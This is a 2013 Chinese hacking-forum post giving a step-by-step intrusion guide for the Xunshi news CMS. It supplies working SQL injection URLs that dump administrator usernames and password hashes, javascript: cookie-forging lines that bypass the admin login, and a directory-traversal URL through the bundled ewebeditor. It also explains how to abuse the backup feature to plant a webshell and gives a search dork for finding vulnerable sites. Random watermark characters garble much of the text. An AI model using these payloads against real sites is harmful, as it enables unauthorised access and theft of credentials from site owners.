中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]
作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘# `" n' m& r' c3 p8 ~7 g+ P7 `
& N9 B7 Y6 Y" X4 t9 s& P) m! A
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新): L1 \" q6 A  n  W' F" C* d

9 z# D, T, u. t% ?9 W9 q6 y. X0 X以下本文总结来自黑防去年第9期杂志上的内容...: [$ f: I- R; _9 ?
+ n. J, m8 }& h$ t! c% P8 n- {
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%" S; K. i+ o) V

5 E8 b: b9 ]) h1 o3 R/ M" f1 M26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 " u. h, M( `9 o  Z

* {9 e' w8 x; C  D记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
; r) A% J4 B  x0 S7 k& M1 R/ i# ?  _这里一个注入
4 L4 E. J4 \: C8 y
3 M* Q# k& D3 m% f# \$ r2 K% c% M效果如图:; t4 ]/ k: \/ @( r% O

1 R3 Z+ o! g$ f) ~6 E
+ R6 Q' P6 `# o% q- F. d' \6 B
* s6 |  l. l1 @9 h$ x" o这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
( R7 W2 n5 v7 m# ^" `( s! l* D
# v' {  t1 C! q7 `密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
! F( a/ U: y; t! `! S! \% u' }- D
1 E) ~. t5 X, {+ W0 f: m; cjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));6 b4 K2 O/ P" ~3 R% K

0 I8 z3 v; d. N- M) N" L9 n2 s那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:; Z' n# O% k& R/ p- Z, }
5 w! B  c3 f" W0 Q: n5 O
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞3 }) H. R. C5 ^' k' f% M- q
' \7 I! j' Y, C
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
" |! ?4 f) P9 V' c# C/ s0 K. T8 L/ I
访问这页面来列目录..步骤如下:
$ ^3 z9 o, C% N1 \3 [) q6 Z0 F5 H6 k  P' A6 n# _& N2 c
javascript:alert(document.cookie="admindj=1")
! n& W/ ~& @2 B0 k; ?* W1 G2 O) S1 @  C# R7 I
http://www.political-security.co ... asp?id=46&dir=../..
7 ]& r* I/ }. [. J( e- U& l6 P; z( g" T" ?
效果如图:
0 i5 M/ g, ^5 }# L$ c$ f7 h; M! X& O4 t" B% [$ u7 g" P
5 b6 g2 e; d, }8 {7 P4 x
/ r' n# c7 {' U, d$ _. T
这样全站目录都能瞧了..找到后台目录..进去..5 Z- c: B. f4 p, _" F. V
% r+ |1 s+ B+ e; ^- G
那么进了后台怎么拿shell??上传--备份就ok了..3 b6 M% l$ o# m' V$ X+ h! u
* B8 q8 t4 v+ A5 v8 p% T) \4 x
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
- G* D: H" W6 }2 c) c' C( i, F& e3 ]$ T' v# i$ k/ u1 C1 u
这个我也碰到过一次..你都可以通过列目录来实现..) M: \( M! N; [* c
5 L5 U- W8 m# I! B/ C7 T
javascript:alert(document.cookie="admindj=1")
+ J" g& X; F: k, y
6 ?$ q/ @  }, S" G4 ehttp://www.political-security.co ... p?action=BackupData
2 x; d) c; M2 W% Q  E6 N- l* j9 ?5 w8 r4 D1 y
备份ok..& l/ {# W. p- i# Y

4 _& n6 _5 \! r* p) m- ~  ~7 z那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
( Q0 `5 Z' E+ Y8 k7 p/ L/ O$ I1 \1 W) N6 _1 w
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
# v/ Z7 o, {) M3 s" @4 [) u# r  ~, E- }% p
然后访问此页面进行注入..步骤如下:0 b# W) G4 _  Q$ [- R7 f, C5 J7 [
* F0 Y+ X; B  q: }9 f1 V1 w
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")/ c# t, c. m( Q) F% v

  W: E3 q1 H) M2 a2 z然后请求admin/admin_chk.asp页面
$ E1 `  z# v$ W7 \; V! i0 q7 x& K  H! {7 D  m5 u
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%. w2 o) @, r+ n8 E, l2 u2 G

3 M+ B2 U2 u$ t" [  V26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
4 s$ D4 R& L5 K/ k; Z$ m" r4 ?4 W* x! B" _: A; J2 }
效果如图所示:& g% i, G+ d0 g0 T

9 m) U8 i( w  ^6 U : \# N7 J2 G1 P+ u% R

0 v# G# U. X# }2 u& [% N讯时漏洞2/ T( T8 ]' a/ ]5 @( k% ~
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)( q+ }! A( ~" Z% O7 K

) {6 W; f. w3 y1 z& A1、/admin/admin_news_pl_view.asp?id=1( n" S- [& b& f; s
//id任意 填入以下语句
: s0 z& t$ V& _: g: r% @9 T! m7 p
; d0 K1 P# R0 f# E! I8 k- d. N" C2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!! D+ h6 U" e: m% A+ j, ~$ F
% ~7 I& X& O! K/ y8 d0 ?

' e5 {6 b- u) y
0 w* s2 g9 p" V7 L6 X3 a3 O3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
! O! c5 I* H' u7 d
4 P# C# K1 J0 I- Y6 p  S, [/ l5 r2 F. J% S5 D. V( u. j$ y7 h

1 T9 e! O* k! l& D1 W1 ^6 U爆出管理员帐号和密码了
! Z/ I3 _  s3 E3 ?/ I+ q
7 C/ y8 a% r0 V7 G, ?
. ]: B  _" |) A. p, T! n9 Y% o1 s! |
7 x3 T! Z1 A8 _& D4、cookies进后台, ^5 Y1 h) p* e# y
7 }8 m% I% K5 Q% F
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
/ B' a4 ], ?* }$ k0 Z: L 9 q% ~: o$ T; X- e
' O1 F) }& N8 `% n5 r& e$ D
: h4 v7 }8 S; k$ V) r0 T! P: A: Y, @' D
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
$ t0 n( @  _, C7 \; |  Y6 W' ?! D5 z
  S: [: t! N& O- B9 C( Q, ]  i) i& n. T) z

( j4 Z5 X9 w8 z6 L) ^# Q6、后台有上传和备份取SHELL不难。
* L6 P7 x5 L8 f( K
+ @" w& c6 F! @; H+ X4 c7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
! r$ Q, U6 R1 w4 R4 n7 c  M
) T: @, P/ Z& P# O9 r& [逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
& G$ M. ^/ O8 U2 V+ j& N4 U' j# Q3 f& s* A

, c/ i" B9 h% d# t
# z/ G" Z$ L$ O



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2